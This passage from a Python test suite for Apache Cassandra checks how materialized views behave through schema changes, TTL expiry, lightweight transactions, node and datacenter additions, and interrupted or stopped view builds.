assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot alter a table
assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
"Cannot use ALTER TABLE on Materialized View")
def test_drop_mv(self):
"""Test that we can drop a view properly"""
session = self.prepare(user_table=True)
# create another materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
"SELECT * FROM users WHERE birth_year IS NOT NULL AND "
"username IS NOT NULL PRIMARY KEY (birth_year, username)"))
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 2, "Expecting {} materialized view, got {}".format(2, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
def test_drop_column(self):
"""Test that we cannot drop a column if it is used by a MV"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"ALTER TABLE ks.users DROP state;",
"Cannot drop column state on base table with materialized views."
)
def test_drop_table(self):
"""Test that we cannot drop a table without deleting its MVs first"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"DROP TABLE ks.users;",
"Cannot drop table when materialized views still depend on it"
)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
session.execute("DROP TABLE ks.users;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 0, "Expecting {} materialized views, got {}".format(0, len(result))
def test_clustering_column(self):
"""Test that we can use clustering columns as primary key for a materialized view"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username, state, birth_year));"))
# create a materialized view that use a compound key
session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
"AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
"AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
session.cluster.control_connection.wait_for_schema_agreement()
self._insert_data(session)
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
def _add_dc_after_mv_test(self, rf, nts):
"""
@jira_ticket CASSANDRA-10978
Add datacenter with configurable replication.
"""
session = self.prepare(rf=rf)
logger.debug("Creating schema")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Writing 1k to base")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Reading 1k from view")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Reading 1k from base")
for i in range(1000):
assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])
logger.debug("Bootstrapping new node in another dc")
node4 = new_node(self.cluster, data_center='dc2')
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
logger.debug("Bootstrapping new node in another dc")
node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)], wait_for_binary_proto=True)
if nts:
session.execute("alter keyspace ks with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_auth with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_traces with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
node4.nodetool('rebuild dc1')
node5.nodetool('rebuild dc1')
cl = ConsistencyLevel.LOCAL_ONE if nts else ConsistencyLevel.ONE
session2 = self.patient_exclusive_cql_connection(node4, consistency_level=cl)
logger.debug("Verifying data from new node in view")
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Inserting 100 into base")
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Verify 100 in view")
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_dc_after_mv_simple_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
"""
self._add_dc_after_mv_test(1, False)
@pytest.mark.resource_intensive
def test_add_dc_after_mv_network_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
"""
self._add_dc_after_mv_test({'dc1': 1}, True)
@pytest.mark.resource_intensive
def test_add_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
"""
@jira_ticket CASSANDRA-12984
Assert that MVs are marked as build after bootstrap. Otherwise newly streamed MVs will be built again
"""
assert_one(session2, "SELECT count(*) FROM system.built_views WHERE keyspace_name = 'ks' AND view_name = 't_by_v'", [1])
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_insert_during_range_movement_rf1(self):
self._base_test_insert_during_range_movement(rf=1)
def test_insert_during_range_movement_rf2(self):
self._base_test_insert_during_range_movement(rf=2)
def test_insert_during_range_movement_rf3(self):
self._base_test_insert_during_range_movement(rf=3)
def _base_test_insert_during_range_movement(self, rf):
"""
@jira_ticket CASSANDRA-14251
        Test that materialized view replication works in the middle of a join
for different replication factors.
"""
session = self.prepare(rf=rf)
logger.debug("Creating table and view")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Starting new node4 in write survey mode")
node4 = new_node(self.cluster)
        # Set batchlog.replay_timeout_in_ms=1 so we can ensure the batchlog will be replayed below
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true",
"-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug("Insert data while node4 is joining")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Finish joining node4")
node4.nodetool("join")
logger.debug('Replay batchlogs')
        time.sleep(0.001)  # wait for batchlog.replay_timeout_in_ms=1 (1 ms) to elapse
self._replay_batchlogs()
logger.debug("Verify data")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_node_after_wide_mv_with_range_deletions(self):
"""
@jira_ticket CASSANDRA-11670
        Test that wide materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v)) WITH compaction = { 'class': 'SizeTieredCompactionStrategy', 'enabled': 'false' }")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(10):
for j in range(100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(10):
for j in range(100):
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100):
if j % 10 == 0:
session.execute("DELETE FROM t WHERE id = {} AND v >= {} and v < {}".format(i, j, j + 2))
self.cluster.flush()
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j))
assert_none(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster)
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100, 110):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(10):
for j in range(110):
if j < 100 and (j % 10 == 0 or (j - 1) % 10 == 0):
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_node_after_very_wide_mv(self):
"""
@jira_ticket CASSANDRA-11670
        Test that very wide materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(5):
for j in range(5000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(5):
for j in range(5000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster)
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(5):
for j in range(5000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(5):
for j in range(5100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
for i in range(5):
for j in range(5100):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_write_survey_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10621
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node in write survey mode.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_allow_filtering(self):
"""Test that allow filtering works as usual for a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])
rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
assert len(rows) == 1000, "Expected 1000 rows but got {}".format(len(rows))
assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
[i, i, 'a', 3.0]
)
assert_one(
session,
"SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
['a', i, i, 3.0]
)
def test_secondary_index(self):
"""Test that secondary indexes cannot be created on a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
"Secondary indexes are not supported on materialized views")
def test_ttl(self):
"""
Test that TTL works as expected for a materialized view
@expected_result The TTL is propagated properly between tables.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in range(100):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))
for i in range(100):
assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])
time.sleep(20)
rows = list(session.execute("SELECT * FROM t_by_v2"))
assert len(rows) == 0, "Expected 0 rows but got {}".format(len(rows))
def test_query_all_new_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
@expected_result The new column is present in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'first_name'), 'Column "first_name" not found'
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
)
def test_query_new_column(self):
"""
Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
@expected_result The new column is not present in the view.
"""
session = self.prepare(user_table=True)
session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT state, username FROM users "
"WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert not hasattr(results[0], 'first_name'), 'Column "first_name" found in view'
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
def test_rename_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when renaming a column
@expected_result The column is also renamed in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users RENAME username TO user")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND user = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'user'), 'Column "user" not found'
assert_one(
session,
"SELECT state, user, birth_year, gender FROM users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f']
)
def test_rename_column_atomicity(self):
"""
        Test that column renaming is done atomically between a table and its materialized views
@jira_ticket CASSANDRA-12952
"""
session = self.prepare(nodes=1, user_table=True, install_byteman=True)
node = self.cluster.nodelist()[0]
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
# Rename a column with an injected byteman rule to kill the node after the first schema update
self.fixture_dtest_setup.allow_log_errors = True
script_version = '4x' if self.cluster.version() >= '4' else '3x'
node.byteman_submit(['./byteman/merge_schema_failure_{}.btm'.format(script_version)])
with pytest.raises(NoHostAvailable):
session.execute("ALTER TABLE users RENAME username TO user")
logger.debug('Restarting node')
node.stop()
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
# Both the table and its view should have the new schema after restart
assert_one(
session,
"SELECT * FROM ks.users WHERE state = 'TX' AND user = 'user1' ALLOW FILTERING",
['user1', 1968, 'f', 'ch@ngem3a', None, 'TX']
)
assert_one(
session,
"SELECT * FROM ks.users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
def test_lwt(self):
"""Test that lightweight transaction behave properly with a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Inserting initial data using IF NOT EXISTS")
for i in range(1000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
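        # Materialized view updates are applied through the batchlog; force a replay so the view
        # reflects the base writes before verifying.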
self._replay_batchlogs()
logger.debug("All rows should have been inserted")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Tyring to UpInsert data with a different value using IF NOT EXISTS")
for i in range(1000):
v = i * 2
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("No rows should have changed")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Update the 10 first rows with a different value")
for i in range(1000):
v = i + 2000
session.execute(
"UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows changed.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 1000
for i in range(1000):
v = i + 2000 if i < 10 else i
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(v),
[v, i, 'a', 3.0]
)
logger.debug("Deleting the first 10 rows")
for i in range(1000):
v = i + 2000
session.execute(
"DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows have been deleted.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 990
for i in range(10, 1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def test_interrupt_build_process(self):
"""Test that an interrupted MV build process is resumed as it should"""
options = {'hinted_handoff_enabled': False}
if self.cluster.version() >= '4':
options['concurrent_materialized_view_builders'] = 4
session = self.prepare(options=options, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
logger.debug("Avoid premature MV build finalization with byteman")
for node in self.cluster.nodelist():
if self.cluster.version() >= '4':
node.byteman_submit(['./byteman/4.0/skip_view_build_finalization.btm'])
node.byteman_submit(['./byteman/4.0/skip_view_build_task_finalization.btm'])
else:
node.byteman_submit(['./byteman/pre4.0/skip_finish_view_build_status.btm'])
node.byteman_submit(['./byteman/pre4.0/skip_view_build_update_distributed.btm'])
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(10000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stop the cluster. Interrupt the MV build process.")
self.cluster.stop()
logger.debug("Checking logs to verify that the view build tasks have been created")
for node in self.cluster.nodelist():
assert node.grep_log('Starting new view build', filename='debug.log')
assert not node.grep_log('Resuming view build', filename='debug.log')
node.mark_log(filename='debug.log')
logger.debug("Restart the cluster")
self.cluster.start()
session = self.patient_cql_connection(node1)
session.execute("USE ks")
logger.debug("MV shouldn't be built yet.")
        assert list(session.execute("SELECT COUNT(*) FROM t_by_v"))[0][0] != 10000
logger.debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
self._wait_for_view("ks", "t_by_v")
logger.debug("Verify all data")
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [10000])
for i in range(10000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug("Checking logs to verify that some view build tasks have been resumed")
for node in self.cluster.nodelist():
assert node.grep_log('Resuming view build', filename='debug.log')
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('4.0')
def test_drop_while_building(self):
"""Test that a parallel MV build is interrupted when the view is removed"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in self.cluster.nodelist():
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in self.cluster.nodelist():
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
        assert failed, "The view shouldn't be queryable"
self._assert_view_meta(session, views=1, exists=False)
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_drop_with_stopped_build(self):
"""Test that MV whose build has been stopped with `nodetool stop` can be dropped"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
self.check_logs_for_errors()
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in nodes:
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
assert failed, "The view shouldn't be queryable"
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_resume_stopped_build(self):
"""Test that MV builds stopped with `nodetool stop` are resumed after restart"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
